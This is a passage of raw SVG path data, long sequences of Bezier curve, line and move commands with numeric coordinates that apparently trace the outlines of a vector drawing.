505.16276,66.314274 503,67.051236 C 500.50091,67.902802 500.50086,67.903038 502.8854,67.701556 C 504.19737,67.5907 505.91744,66.521112 506.70778,65.324692 C 508.05936,63.278661 508.00674,63.182087 505.82238,63.699666 C 503.68921,64.205114 503.64374,64.137923 505.2643,62.874974 C 506.82037,61.662286 506.32028,61.484671 501.02734,61.370126 C 494.30609,61.224671 486.78115,58.395306 489.11814,56.892285 C 489.87816,56.40348 491.80506,56.278344 493.40013,56.614204 C 495.85673,57.131469 496.1991,56.961234 495.63879,55.501089 C 495.12254,54.155759 495.36401,53.925999 496.73866,54.454547 C 499.59244,55.551812 509.71418,56.064451 508.03976,55.026918 C 506.79373,54.254826 506.85885,53.813455 508.4837,52.018015 C 510.11444,50.216062 510.14463,50.00727 508.69393,50.563954 C 506.81408,51.285321 506.34848,49.520693 508.12842,48.420634 C 508.898,47.945004 508.73232,47.429701 507.60738,46.800157 C 504.75718,45.205102 506.90415,44.004118 512.80902,43.890434 L 518.5,43.780869 L 514.1119,42.919005 C 509.3917,41.991913 507.7453,40.995728 509.75,40.279762 C 510.4375,40.034226 511,39.195833 511,38.416667 C 511,37.6375 511.87344,37 512.94098,37 C 514.00852,37 515.16008,36.55 515.5,36 C 515.83992,35.45 515.36138,35 514.43657,35 C 512.98305,35 512.94116,34.770639 514.12756,33.308042 C 514.8824,32.377464 515.02851,31.897772 514.45225,32.242059 C 513.87599,32.586345 512.75099,32.454617 511.95225,31.94933 C 510.95927,31.321162 512.23936,30.997797 516,30.926818 C 524.66514,30.763271 531.16714,30.210764 535.5,29.269805 L 539.5,28.401133 L 533.17103,27.707645 C 529.46049,27.301068 526.07449,27.42495 524.98677,28.007078 C 523.96636,28.553185 520.57935,29 517.46009,29 C 514.34082,29 509.08645,29.70022 505.78372,30.556043 C 499.05927,32.298523 496.93203,31.877245 502.42513,29.890912 C 507.57491,28.028727 506.89413,26.597762 501.25,27.420838 C 492.17197,28.744674 485.26258,29.0587 488,28.023039 C 489.70888,27.376511 486.38617,27.195839 477.5,27.452103 C 469.96932,27.669277 465.76215,27.492455 467.5,27.031817 C 469.15,26.594464 476.9125,26.183388 484.75,26.118315 C 494.27839,26.039203 499,25.639535 499,24.912102 C 499,24.207204 497.50377,24.029977 494.75,24.408695 C 491.83009,24.810263 491.12592,24.712458 492.5,24.096182 C 494.36505,23.259704 470.86584,23.449207 460.25,24.356253 C 455.01365,24.803661 454.5435,23.273085 459.75,22.728468 C 462.96894,22.391757 462.78483,22.3124 458.45,22.168103 C 455.6725,22.075646 452.92266,22.477341 452.33924,23.060758 C 451.75583,23.644175 449.41583,24.147223 447.13924,24.178642 C 444.86266,24.210061 443.00008,24.52022 443.00017,24.867884 C 443.00026,25.215548 441.31276,25.542128 439.25017,25.593618 C 428.57486,25.860115 426.91807,26.058416 427.5,27 C 428.25993,28.229587 429.09914,28.278953 419,26.5 C 414.325,25.676504 409.375,25.022416 408,25.046471 C 405.56404,25.089087 405.57592,25.122587 408.46346,26.354161 C 412.86314,28.230679 410.10704,29.136744 403.63731,27.940751 C 399.75843,27.223701 397.44334,27.227548 396.08726,27.953297 C 393.45775,29.360573 392.95788,29.273341 393.62904,27.524314 C 394.09684,26.305267 392.96096,26.060186 387.09766,26.115081 C 383.19395,26.151629 380,26.364397 380,26.587898 C 380,26.811399 381.4625,27.677159 383.25,28.511807 C 385.0375,29.346456 385.6,29.760684 384.5,29.432313 C 383.4,29.103942 380.08136,28.578588 377.12525,28.264859 C 372.70447,27.795687 371.58027,27.99863 370.7914,29.408261 C 370.06388,30.708266 369.09797,30.960792 366.79105,30.454106 C 364.54778,29.961403 363.94547,30.102759 364.49557,30.992835 C 365.06344,31.911665 364.75898,31.941379 363.21935,31.117391 C 361.78158,30.34792 360.31509,30.342798 358.14394,31.099666 C 356.46457,31.685097 354.28267,31.954367 353.29527,31.698044 C 351.9847,31.357828 352.17497,31.181708 354,31.045716 C 359.52425,30.634078 360.0129,29.39188 354.62974,29.444823 C 351.54411,29.47517 349.52732,29.670736 350.14799,29.879413 C 351.69642,30.400017 337.13521,34.96998 333.875,34.98661 C 329.24247,35.01024 325,36.213462 325,37.50368 C 325,39.445032 312.87554,43.65915 310.86504,42.416591 C 310.13065,41.962714 309.95819,42.123331 310.40451,42.845492 C 310.79695,43.480471 311.85648,44 312.75902,44 C 316.21924,44 312.09807,46.266743 307.96021,46.639462 C 302.47566,47.133483 300.68965,48.312828 304.4175,48.978797 C 308.98788,49.795281 308.62469,51.704796 303.69923,52.755295 C 297.173,54.147204 264.34241,53.529068 262.47484,51.97912 C 261.40885,51.094423 261.27538,50.37311 262.01319,49.484104 C 263.41397,47.796267 261.22663,47.026813 254.66821,46.90032 C 248.002,46.771748 244.01863,45.724552 245.86206,44.585251 C 246.6001,44.129115 252.16015,44.077137 258.21772,44.469744 C 265.64302,44.950997 269.02556,44.850366 268.59943,44.160886 C 267.27833,42.023297 270.38528,41.757576 272.08965,43.862386 C 273.06081,45.061718 274.11574,45.621752 274.43393,45.106905 C 274.75212,44.592059 274.44716,43.942912 273.75623,43.664358 C 273.0653,43.385803 273.53906,43.122368 274.80902,43.078947 C 276.07898,43.035526 276.86906,42.597153 276.56476,42.104785 C 275.78183,40.837971 278.76289,39.779097 283.89493,39.501104 C 289.10917,39.218658 292.19111,39.881766 291.42505,41.121278 C 291.12119,41.612922 291.99894,41.501973 293.3756,40.874725 C 295.36209,39.969619 296.72077,40.071234 299.95955,41.367137 C 305.09068,43.420208 308.38778,43.442608 310.05335,41.435714 C 310.76739,40.575357 312.28499,40.069296 313.4258,40.311133 C 314.56661,40.552971 316.625,40.423504 318,40.02343 C 320.35876,39.337117 320.29181,39.253812 316.81489,38.548892 C 314.78807,38.137971 312.74159,38.041674 312.26714,38.334899 C 311.79269,38.628123 310.78618,38.485889 310.03045,38.018822 C 308.15043,36.856906 314.34317,35.284877 324.25,34.409183 C 328.5125,34.032407 332,33.347456 332,32.887068 C 332,32.426681 333.41997,32.333994 335.15549,32.681098 C 337.38932,33.127865 338.10501,32.978921 337.60578,32.171156 C 337.11519,31.377366 337.75261,31.198378 339.70029,31.583014 C 341.24013,31.887108 343.625,31.683856 345,31.131343 C 347.27212,30.218343 347.08981,30.107337 343,29.913554 C 339.59023,29.751993 339.20848,29.595332 341.42433,29.266924 C 343.0327,29.028547 343.86777,28.533472 343.28003,28.166756 C 342.69229,27.80004 346.70645,27.419899 352.20038,27.321997 C 357.69431,27.224095 362.44674,26.886595 362.76134,26.571997 C 364.14247,25.19086 361.27474,24.520902 353.18395,24.334533 C 348.40778,24.224514 339.55,23.859394 333.5,23.523153 C 327.45,23.186913 316.875,23.29455 310,23.762347 C 298.53345,24.542567 297.78937,24.710064 301,25.788286 C 304.06292,26.816903 303.51737,26.891471 296.63138,26.385408 C 290.62945,25.944315 288.93954,26.093163 289.50794,27.012844 C 290.06651,27.916638 289.24549,28.048321 286.22918,27.53872 C 283.72622,27.115847 281.95516,27.263532 281.54361,27.929441 C 281.11088,28.629606 282.43888,29 285.38197,29 C 287.85697,29 290.16008,29.45 290.5,30 C 290.83992,30.55 291.65398,30.993109 292.30902,30.984687 C 293.04,30.975289 292.92065,30.564135 292,29.92017 C 290.89486,29.147158 291.55296,29.029669 294.5,29.473853 C 296.7,29.805441 300.24107,30.336849 302.36905,30.654759 C 304.49703,30.972669 306.52203,30.792861 306.86905,30.255184 C 307.21607,29.717508 309.75,28.998871 312.5,28.658212 C 315.85528,28.242574 316.84211,28.33827 315.5,28.949131 C 313.63692,29.797112 313.67115,29.872341 316,30.04803 C 318.35527,30.225711 318.32632,30.280823 315.5,31 C 313.85,31.419854 309.66094,31.816612 306.19098,31.881685 C 302.26648,31.955283 300.11555,32.377954 300.5,33 C 300.83992,33.55 302.32898,34.006891 303.80902,34.015313 C 305.91378,34.02729 306.17323,34.241799 305,35 C 303.20439,36.160411 298.67636,36.332679 299.36756,35.214286 C 299.63464,34.782143 299.0987,34.347562 298.17658,34.24855 C 297.25446,34.149538 293.8,33.794618 290.5,33.459838 L 284.5,32.851148 L 287.5,34.511369 C 289.15,35.42449 292.95866,36.430863 295.96369,36.747752 C 298.97371,37.065168 300.6686,37.590076 299.73778,37.91659 C 297.53828,38.688134 280.10659,38.439926 279.29213,37.625466 C 278.94813,37.28146 280.11822,37 281.89235,37 C 283.79603,37 284.86381,36.588658 284.49773,35.99633 C 284.15657,35.444311 282.78001,35.268095 281.43871,35.604738 C 279.95242,35.977775 279,35.783938 279,35.108408 C 279,34.498784 277.90156,34 276.55902,34 C 275.21648,34 273.79695,33.480471 273.40451,32.845492 C 272.97864,32.156422 273.12857,31.961424 273.77639,32.361803 C 274.37337,32.730755 275.14446,32.575283 275.48992,32.016312 C 276.3225,30.669172 274.42091,30.720192 272.20433,32.104465 C 270.86372,32.941689 269.50665,32.820707 266.59578,31.604465 C 262.43596,29.866381 256.52774,29.426848 257.45323,30.924318 C 257.76742,31.432693 257.35583,31.995193 256.53858,32.174318 C 253.29858,32.884461 256.84089,34.976755 261.54933,35.133966 C 269.66514,35.404947 271.44895,36.839432 264,37.104717 C 258.9529,37.284463 258.39409,37.435017 261.5,37.77827 C 264.85537,38.149091 265.17768,38.366688 263.5,39.128477 C 262.09655,39.765745 262.69309,39.858822 265.5,39.440531 C 267.7,39.112681 270.75627,38.725669 272.29172,38.580503 C 273.82716,38.435338 275.60466,37.795339 276.24172,37.158283 C 277.76587,35.634128 279.06368,35.681583 278.75,37.25 C 278.37762,39.111876 274.88572,40.846835 272.41315,40.398473 C 271.21851,40.181843 269.68173,40.678565 268.99809,41.5023 C 268.31445,42.326035 267.06021,43 266.21089,43 C 265.36157,43 264.97926,42.687406 265.36132,42.305346 C 265.74338,41.923287 263.68088,40.874252 260.77799,39.974157 C 257.71983,39.025921 255.61449,37.818021 255.77221,37.102191 C 255.92192,36.422703 255.24692,35.955183 254.27221,36.063256 C 251.76208,36.341572 246,34.897433 246,33.99001 C 246,31.870949 252.97221,29.164318 260,28.555172 C 261.925,28.388319 265.92392,27.745148 268.88649,27.125902 C 271.84906,26.506656 275.67406,26.053242 277.38649,26.118315 L 280.5,26.23663 L 277.5,27 L 274.5,27.76337 L 277.20031,27.881685 C 278.68548,27.946758 280.26048,27.363036 280.70031,26.584525 C 281.23033,25.64638 284.02916,24.989106 289,24.635442 C 293.125,24.341957 302.125,23.603716 309,22.994905 C 316.48356,22.332204 328.52302,22.153091 339,22.548589 C 362.3386,23.429605 363.85879,23.529506 368.48333,24.486139 C 371.84196,25.180902 372.15562,25.442053 370.48333,26.15131 C 369.35659,26.629192 370.8754,26.670193 374,26.246245 C 377.025,25.83581 385.0125,25.502203 391.75,25.504896 C 398.4875,25.507589 404,25.124681 404,24.653989 C 404,24.183297 406.5875,23.912549 409.75,24.052326 C 420.23354,24.515682 425.66381,24.084022 424,22.919572 C 422.92735,22.168857 425.70512,21.980846 433.75,22.259652 C 439.9375,22.474087 445,22.278389 445,21.824767 C 445,20.579921 488.77178,20.870665 494,22.150238 C 496.475,22.755978 499.85,23.195885 501.5,23.127809 C 503.15,23.059732 505.85,23.414447 507.5,23.916064 C 509.23566,24.443721 509.73156,24.864319 508.67668,24.914047 C 507.4897,24.970002 506.97957,25.610758 507.21499,26.75 C 507.43582,27.818606 508.34045,28.40159 509.53831,28.247256 C 520.92338,26.780401 535.31438,26.602273 541,27.857831 C 544.36119,28.600085 544.22238,28.682305 537.5,29.930932 C 533.65,30.646039 528.5303,32.079122 526.12288,33.115563 C 523.71547,34.152003 520.56547,35.031628 519.12288,35.070285 C 516.7989,35.132561 516.72792,35.230391 518.5,35.928749 C 520.21666,36.605266 520.00415,36.824475 517,37.476061 C 515.075,37.893584 513.11446,38.463525 512.64324,38.742597 C 511.4495,39.449565 514.07693,40.966179 516.52749,40.984687 C 517.64262,40.993109 519.57657,41.715543 520.82517,42.590095 C 522.62606,43.851491 522.85346,44.471641 521.92523,45.590095 C 521.0626,46.6295 521.04779,47.352658 521.86888,48.342009 C 522.48145,49.080114 522.71704,49.949625 522.39241,50.274256 C 522.06778,50.598887 522.81705,50.599097 524.05746,50.274723 C 525.61661,49.866995 526.09193,50.042241 525.59735,50.842476 C 524.7012,52.292478 519,52.377604 519,50.940983 C 519,50.358524 519.46115,50.166972 520.02478,50.515313 C 521.56982,51.470202 520.7192,48.701266 519,47.17946 C 517.89989,46.205661 517.87443,46.045943 518.90451,46.580351 C 519.8279,47.059412 520.0646,46.91354 519.59549,46.154508 C 519.16844,45.463525 519.53159,45 520.5,45 C 521.4105,45 521.82423,44.524619 521.44615,43.912868 C 520.96233,43.130025 520.46998,43.130025 519.68713,43.912868 C 519.08921,44.51079 517.04,45 515.13333,45 C 511.84255,45 511.27119,45.834513 514.15837,46.423994 C 516.5951,46.921506 519,48.201387 519,49.000691 C 519,49.433384 517.14061,49.369628 514.86802,48.859012 C 512.59544,48.348396 510.51036,48.156305 510.23452,48.432144 C 509.95868,48.707983 511.60815,49.233518 513.9,49.6 C 516.19185,49.966482 517.83392,50.499412 517.54904,50.784288 C 517.26417,51.069165 517.81159,51.894929 518.76554,52.61932 C 520.36175,53.831412 520.31816,53.938928 518.21862,53.968197 C 516.96385,53.985688 515.67821,54.675 515.36163,55.5 C 515.04504,56.325 513.59667,57.001026 512.14301,57.00228 C 509.89767,57.004218 509.48398,57.455603 509.39352,60.00228 C 509.33495,61.651026 509.67245,63 510.14352,63 C 511.47409,63 511.15163,66.629265 509.71514,67.821446 C 509.00847,68.407931 505.29597,69.999415 501.46514,71.358076 C 494.93728,73.673283 492.34564,74.203202 481,75.542642 C 473.68952,76.4057 471.66345,77.032807 468.5,79.411628 C 465.12162,81.952071 459.19026,84.235622 457.95423,83.471712 C 457.50541,83.194327 456.85554,83.424717 456.51008,83.983688 C 456.16462,84.54266 454.07638,85 451.86955,85 C 448.07548,85 444.36914,87.035808 445.71429,88.380952 C 446.05476,88.721429 445.80833,89 445.16667,89 C 444.525,89 444,89.575658 444,90.279241 C 444,90.982823 443.07433,92.220323 441.94295,93.029241 C 440.81157,93.838158 439.06256,96.354428 438.05626,98.62095 C 435.21842,105.01274 431.99093,106.07787 425.5201,102.75814 z M 406.38691,87.817021 C 406.0981,87.349717 405.4429,87.226274 404.9309,87.542705 C 403.62252,88.35133 403.76984,88.666667 405.45601,88.666667 C 406.25682,88.666667 406.67572,88.284326 406.38691,87.817021 z M 407.5,85 C 407.83992,84.45 407.44303,84 406.61803,84 C 405.79303,84 404.83992,84.45 404.5,85 C 404.16008,85.55 404.55697,86 405.38197,86 C 406.20697,86 407.16008,85.55 407.5,85 z M 403.59744,65.765313 C 402.99385,65.361235 401.68594,65.023735 400.69098,65.015313 C 399.69554,65.006887 399.17106,64.532239 399.52477,63.959918 C 399.94789,63.275298 399.19909,63.161106 397.33379,63.625792 C 394.7746,64.26334 394.63299,64.170323 395.87244,62.665874 C 397.38355,60.831693 396.35004,60.472611 394,62.015313 C 392.66667,62.89059 392.66667,63.10941 394,63.984687 C 394.825,64.526265 396.4,65.007894 397.5,65.054972 C 399.5,65.140571 399.5,65.140571 397.5,66.046696 C 396.11854,66.672584 396.73708,66.756971 399.5,66.319555 C 403.10148,65.74938 403.36677,65.847131 402.16278,67.3007 C 401.23884,68.416162 399.92534,68.735067 397.91278,68.332556 C 394.47277,67.644554 394.02484,68.702933 397.25,69.898575 C 398.92292,70.518766 400.16619,70.189902 402.09744,68.616351 C 403.77989,67.245521 404.30829,66.241194 403.59744,65.765313 z M 499.573,65.478529 C 497.51792,63.923769 496.36955,64.170889 497.45888,65.933469 C 497.82142,66.520061 498.87898,66.985688 499.80902,66.968197 C 501.29367,66.940274 501.26487,66.758504 499.573,65.478529 z M 494.5,65 C 494.16008,64.45 492.67102,64.053242 491.19098,64.118315 L 488.5,64.23663 L 491.5,65 C 493.15,65.419854 494.63906,65.816612 494.80902,65.881685 C 494.97898,65.946758 494.83992,65.55 494.5,65 z M 498.44236,59.093259 C 498.75058,58.594551 498.10214,58.422035 497.00138,58.70989 C 494.66639,59.320503 494.37123,60 496.44098,60 C 497.23352,60 498.13414,59.591966 498.44236,59.093259 z M 292.48843,51.841394 C 292.85259,51.47916 294.51374,51.573746 296.17986,52.051584 C 298.2327,52.640331 300.22308,52.493996 302.35459,51.597609 L 305.5,50.274837 L 299.96088,49.548543 C 296.91436,49.149081 292.18936,49.126051 289.46088,49.497364 C 283.90536,50.253402 283.58362,50.263479 276.25,49.911103 C 273.3625,49.772361 271,49.276803 271,48.809865 C 271,48.342926 269.9014,48.1601 268.55866,48.403585 C 267.17769,48.654002 265.60431,48.228154 264.93621,47.423142 C 264.28661,46.640414 263.02271,46.013684 262.12756,46.030409 C 260.66401,46.057753 260.67026,46.160124 262.18953,47.046258 C 263.11877,47.588251 263.71445,48.886426 263.51327,49.931093 C 263.18667,51.626969 263.73909,51.812713 268.66883,51.664599 C 271.70558,51.57336 274.33034,51.724 274.50163,51.999355 C 274.9686,52.749999 291.7229,52.602861 292.48843,51.841394 z M 512.5,52 C 512.83992,51.45 512.66803,51 512.11803,51 C 511.56803,51 510.83992,51.45 510.5,52 C 510.16008,52.55 510.33197,53 510.88197,53 C 511.43197,53 512.16008,52.55 512.5,52 z M 301.25086,47.086941 C 301.66383,46.708179 299.41383,46.510426 296.25086,46.647492 C 293.08789,46.784557 286.45,46.951572 281.5,47.018636 C 275.28092,47.102894 273.11798,47.417967 274.5,48.038318 C 276.69589,49.023998 300.04421,48.19363 301.25086,47.086941 z M 256.76166,45.31292 C 255.80557,45.062627 254.00557,45.053546 252.76166,45.292739 C 251.51775,45.531932 252.3,45.736717 254.5,45.747817 C 256.7,45.758916 257.71775,45.563212 256.76166,45.31292 z M 307.41642,44.864773 C 307.14916,44.432331 304.24876,44.187776 300.97108,44.321317 C 295.7486,44.534096 295.28918,44.409965 297.25584,43.317496 C 299.65667,41.98384 299.64434,41.961362 296.30711,41.587993 C 295.10102,41.453056 294.20102,41.828056 294.30711,42.421326 C 294.52389,43.63361 289.0322,43.760665 284.66621,42.644376 C 282.79597,42.166195 282.05099,42.273485 282.47523,42.959918 C 282.87429,43.60561 281.76849,44 279.55902,44 C 277.60156,44 276,44.347177 276,44.771505 C 276,45.195832 283.17803,45.567314 291.95118,45.59702 C 300.72433,45.626726 307.68369,45.297215 307.41642,44.864773 z M 282,33 C 282,32.45 281.2125,32.006891 280.25,32.015313 C 278.75445,32.028399 278.7181,32.171574 280,33 C 281.88721,34.21961 282,34.21961 282,33 z M 268.93548,29.465472 C 267.65139,28.778246 265.91838,28.477827 265.08435,28.797875 C 263.98238,29.220738 264.37858,29.711415 266.53396,30.593177 C 270.19804,32.09214 272.13976,31.180347 268.93548,29.465472 z M 278.25,29.337719 C 277.5625,29.060307 276.4375,29.060307 275.75,29.337719 C 275.0625,29.615132 275.625,29.842105 277,29.842105 C 278.375,29.842105 278.9375,29.615132 278.25,29.337719 z M 369.48188,29.029317 C 370.32786,27.660493 365.60709,26.66023 362.82217,27.618218 C 360.66898,28.358896 360.75469,28.465042 364,29.076871 C 365.925,29.439787 367.81094,29.795956 368.19098,29.868359 C 368.57102,29.940761 369.15193,29.563193 369.48188,29.029317 z M 367.25,25.337719 C 366.5625,25.060307 365.4375,25.060307 364.75,25.337719 C 364.0625,25.615132 364.625,25.842105 366,25.842105 C 367.375,25.842105 367.9375,25.615132 367.25,25.337719 z M 504.75,24.310674 C 503.7875,24.059147 502.2125,24.059147 501.25,24.310674 C 500.2875,24.562202 501.075,24.767997 503,24.767997 C 504.925,24.767997 505.7125,24.562202 504.75,24.310674 z M 470.73097,22.307009 C 469.758,22.053466 468.408,22.07014 467.73097,22.344063 C 467.05394,22.617986 467.85,22.825431 469.5,22.805051 C 471.15,22.784672 471.70394,22.560553 470.73097,22.307009 z M 580.43026,103.67885 C 579.6296,101.59236 580.62996,100.22996 581.97503,101.57503 C 582.54305,102.14305 582.55778,103.0975 582.01215,103.98033 C 581.24492,105.22174 581.00475,105.17596 580.43026,103.67885 z M 346,102.46862 C 346,100.85123 347.56262,100.48329 348.43524,101.89522 C 348.73954,102.38758 348.3161,103.04846 347.49426,103.36383 C 346.5866,103.71213 346,103.3607 346,102.46862 z M 357.09549,99.059017 C 356.10095,98.444357 356.07329,98.072736 356.98037,97.512132 C 357.63701,97.106305 358.62426,97.224265 359.17426,97.774265 C 360.47748,99.077482 358.80143,100.11334 357.09549,99.059017 z M 304.44615,97.912868 C 303.58802,96.524389 305.49011,94.566834 306.86919,95.419157 C 308.01765,96.128941 307.28228,99 305.95203,99 C 305.49333,99 304.81569,98.51079 304.44615,97.912868 z M 291.73557,96.402234 C 290.26309,94.929754 292.45896,93 295.60699,93 C 299.63114,93 299.99613,94.225104 296.45295,95.839485 C 293.581,97.148032 292.59856,97.26523 291.73557,96.402234 z M 296,95 C 297.21948,94.211914 297.09025,94.027762 295.30902,94.015313 C 294.10398,94.006891 292.83992,94.45 292.5,95 C 291.71313,96.273187 294.02988,96.273187 296,95 z M 1251.2489,92.969282 C 1250.0108,92.471171 1248.3233,92.322454 1247.4989,92.638801 C 1246.6021,92.982914 1246,92.645411 1246,91.798669 C 1246,90.791114 1247.0804,90.446163 1249.75,90.601348 C 1253.3162,90.808649 1259.7916,92.803146 1257.3318,92.936614 C 1256.6893,92.971476 1255.5643,93.196862 1254.8318,93.43747 C 1254.0993,93.678079 1252.487,93.467394 1251.2489,92.969282 z M 310.96641,91.958076 C 309.93017,91.302691 310.74673,91.026134 313.75,91.015313 C 316.0875,91.006891 317.99911,91.3375 317.99801,91.75 C 317.99505,92.868159 312.65519,93.026174 310.96641,91.958076 z M 516.5,92.021184 C 515.4,91.536846 512.5875,91.108942 510.25,91.070285 C 505.68584,90.994804 505.06674,90.402899 507.60823,88.54452 C 508.95155,87.562256 508.6633,87.388465 505.85823,87.489429 C 501.2638,87.654798 499.83688,86.68672 503.5,85.889518 L 506.5,85.23663 L 503,85.085046 L 499.5,84.933461 L 501.86078,82.966731 C 504.49832,80.769445 509.11249,80.281073 508.63251,82.25 C 508.46491,82.9375 508.51654,83.1625 508.74723,82.75 C 509.48661,81.427905 511.76605,81.947961 512.39301,83.581787 C 513.25966,85.840231 513.17693,86.005123 511.5,85.361626 C 510.55016,84.997137 510,85.375419 510,86.393011 C 510,87.276855 510.525,88 511.16667,88 C 511.80833,88 512.01708,88.31625 511.63056,88.702777 C 510.33237,90.000967 519.31902,92.050579 522,91.067767 C 524.33227,90.212786 531.88003,88.598745 533,88.715486 C 533.275,88.744151 534.28161,88.000235 535.23691,87.062339 C 536.88161,85.447613 536.76215,85.244086 532.98691,83.228979 C 530.79411,82.058526 529,81.528185 529,82.050442 C 529,82.572699 527.65,83 526,83 C 524.35,83 523,83.476558 523,84.059017 C 523,84.661216 522.4608,84.777001 521.75,84.327437 C 519.93694,83.180716 515,83.069981 515,84.176034 C 515,84.694134 514.54266,84.835382 513.98369,84.489919 C 511.6878,83.070981 514.45726,82.077663 520.57829,82.124642 C 524.15683,82.152107 527.64325,81.711039 528.3259,81.144492 C 529.01699,80.570934 530.15527,80.477927 530.89424,80.934635 C 531.62417,81.385761 533.14195,81.514134 534.26707,81.219909 C 535.71011,80.842544 536.08975,81.045772 535.55576,81.909785 C 535.07289,82.691081 535.55944,83.333537 536.89938,83.683939 C 538.05472,83.986067 539,84.839946 539,85.581448 C 539,87.414128 535.58174,89.110294 529,90.543528 C 525.975,91.202249 522.375,92.002336 521,92.3215 C 519.625,92.640663 517.6,92.505521 516.5,92.021184 z M 327.25,81.034846 C 329.3125,79.889402 331,78.390244 331,77.703383 C 331,76.01131 323.20118,76.033362 322.55116,77.727273 C 321.97715,79.223131 315.3983,79.453486 314.50555,78.008986 C 313.84283,76.936678 316.78664,72.378548 318.63245,71.618992 C 322.57003,69.998667 335.11211,77.049445 331.90454,79.08016 C 330.80278,79.777683 330.93115,79.997466 332.5,80.099686 C 333.6,80.171358 332.925,80.567493 331,80.979986 C 329.075,81.39248 326.6,82.042161 325.5,82.423723 C 324.4,82.805284 325.1875,82.180289 327.25,81.034846 z M 321.75,76.75 C 321.20785,75.123558 315.79215,75.123558 315.25,76.75 C 314.96717,77.598485 316.01111,78 318.5,78 C 320.98889,78 322.03283,77.598485 321.75,76.75 z M 322,74 C 321.175,73.466844 320.05,73.030626 319.5,73.030626 C 318.95,73.030626 319.175,73.466844 320,74 C 320.825,74.533156 321.95,74.969374 322.5,74.969374 C 323.05,74.969374 322.825,74.533156 322,74 z M 248,78.5 C 248,78.225 247.8875,77.705398 247.75,77.345329 C 247.24441,76.021348 250.95014,76.234995 252.07876,77.594896 C 253.0299,78.740951 252.76141,79 250.62244,79 C 249.1801,79 248,78.775 248,78.5 z M 857.5,77.234687 C 856.15478,76.246368 855.76656,74 856.94098,74 C 857.45852,74 858.17957,74.481535 858.54331,75.070078 C 858.90705,75.65862 860.17111,76.530096 861.35233,77.006691 C 863.41664,77.839592 863.40296,77.875093 861,77.921301 C 859.625,77.947741 858.05,77.638765 857.5,77.234687 z M 233,73 C 233,72.45 233.45,72 234,72 C 234.55,72 235,72.45 235,73 C 235,73.55 234.55,74 234,74 C 233.45,74 233,73.55 233,73 z M 755,73.239022 C 755,71.311475 757.97406,69.776675 760.48701,70.407385 C 763.11061,71.065866 763.90935,72.574667 761.75,72.79313 C 761.0625,72.862685 759.2625,73.215145 757.75,73.576374 C 756.15372,73.957613 755,73.816083 755,73.239022 z M 760,72 C 761.21948,71.211914 761.09025,71.027762 759.30902,71.015313 C 758.10398,71.006891 756.83992,71.45 756.5,72 C 755.71313,73.273187 758.02988,73.273187 760,72 z M 876.25,68.968838 C 874.06394,68.090148 872.98772,64 874.94258,64 C 875.461,64 875.70953,64.91202 875.49486,66.02671 C 875.27749,67.155427 875.53169,67.78943 876.06859,67.457612 C 876.59881,67.129917 876.77373,66.442898 876.45729,65.930902 C 876.14086,65.418906 876.32102,65 876.85765,65 C 877.39428,65 878.04997,65.5625 878.31475,66.25 C 878.57952,66.9375 878.75117,66.552642 878.69618,65.394761 C 878.64119,64.23688 878.12456,63.326085 877.5481,63.370774 C 876.97165,63.415462 873.22304,62.857222 869.21786,62.13024 C 864.05975,61.193989 861.56311,61.117693 860.65825,61.868663 C 859.88095,62.513766 858.22953,62.619363 856.44039,62.138365 C 853.54971,61.361225 853.53693,61.328013 855.68426,60.17393 C 856.8856,59.528268 858.9331,59 860.23426,59 C 861.53542,59 863.0953,58.504702 863.70066,57.899337 C 864.50155,57.098453 864.98292,57.370815 865.46805,58.899337 C 865.83475,60.054702 866.73131,61 867.4604,61 C 869.20354,61 870.23103,58.252238 868.69382,57.701512 C 865.77999,56.657595 869.6824,55.757765 880.17664,55.053763 C 886.40449,54.63597 890.4875,54.227959 889.25,54.14707 C 886.91624,53.994525 885.99087,51 888.27749,51 C 890.25283,51 894.1032,54.023996 893.45771,55.068422 C 893.14105,55.58079 888.74602,56.044856 883.69098,56.09968 C 878.63594,56.154504 873.6,56.492004 872.5,56.84968 C 869.89836,57.69563 869.44901,60 871.88569,60 C 874.48141,60 879.31294,62.622918 879.62585,64.201939 C 879.76733,64.915873 880.10855,66.5125 880.38412,67.75 C 880.92485,70.178201 879.96371,70.461567 876.25,68.968838 z M 769.78754,64.704164 C 765.96465,62.627557 765.64455,61 769.05902,61 C 770.12656,61 770.8875,60.474289 770.75,59.831753 C 770.6125,59.189218 771.50983,58.136551 772.74407,57.492494 C 773.97831,56.848437 774.65331,55.957705 774.24407,55.51309 C 773.83483,55.068475 774.51312,54.954176 775.75138,55.259091 C 776.98964,55.564006 777.79125,55.471251 777.53274,55.052969 C 777.27422,54.634687 778.1736,53.786301 779.53136,53.167667 C 780.88911,52.549033 782,51.54573 782,50.938105 C 782,50.330481 782.5625,50.026842 783.25,50.263353 C 783.9375,50.499863 786.975,49.838865 790,48.794467 C 793.025,47.75007 798.875,46.708097 803,46.478973 C 807.125,46.249849 813.9272,45.527061 818.11599,44.872778 C 826.65359,43.539219 830.30702,44.136928 827.92754,46.477968 C 826.6665,47.718633 818.75123,49.064398 805.1722,50.346859 C 802.79191,50.571664 800.33941,51.260586 799.7222,51.877798 C 799.10499,52.495009 797.86627,53 796.96948,53 C 794.77752,53 786.36949,57.318066 783.2067,60.068074 L 780.65746,62.284604 L 785.07873,64.593916 L 789.5,66.903229 L 781.5,66.812009 C 775.50009,66.743594 772.57184,66.21661 769.78754,64.704164 z M 782.5,64.239689 C 778.86433,62.131378 778.24168,60.054326 780.6794,58.166507 C 782.31978,56.896168 782.15845,56.819634 779.04971,57.393358 C 777.15205,57.743575 775.35205,58.393663 775.04971,58.837999 C 774.74737,59.282335 773.7125,59.936436 772.75,60.291557 C 770.07676,61.277867 770.66043,62.766507 774.00873,63.501917 C 775.66353,63.865372 776.83173,64.463626 776.60474,64.831372 C 776.37775,65.199117 778.28632,65.60786 780.84601,65.739689 L 785.5,65.979379 L 782.5,64.239689 z M 786.25,55.19061 C 786.1081,54.514841 787.10657,54 788.55902,54 C 790.20629,54 790.86927,53.597493 790.41982,52.870268 C 789.99266,52.179106 790.2609,51.934574 791.1108,52.240366 C 791.87486,52.515273 793.9625,52.146614 795.75,51.421125 C 797.5375,50.695636 799,50.319924 799,50.58621 C 799,50.852497 799.7875,50.650283 800.75,50.136846 C 801.7125,49.623409 806.2022,48.939541 810.72711,48.61714 C 821.64644,47.839134 826.91336,46.949207 827.64968,45.757812 C 828.2326,44.814633 823.59046,45.056942 816.5,46.339801 C 814.85,46.638332 809.26222,47.138599 804.08271,47.451507 C 798.88982,47.765223 793.3258,48.688717 791.67907,49.510215 C 790.03658,50.329597 788.0603,51 787.28734,51 C 786.51439,51 786.16008,51.45 786.5,52 C 786.83992,52.55 786.36138,53 785.43657,53 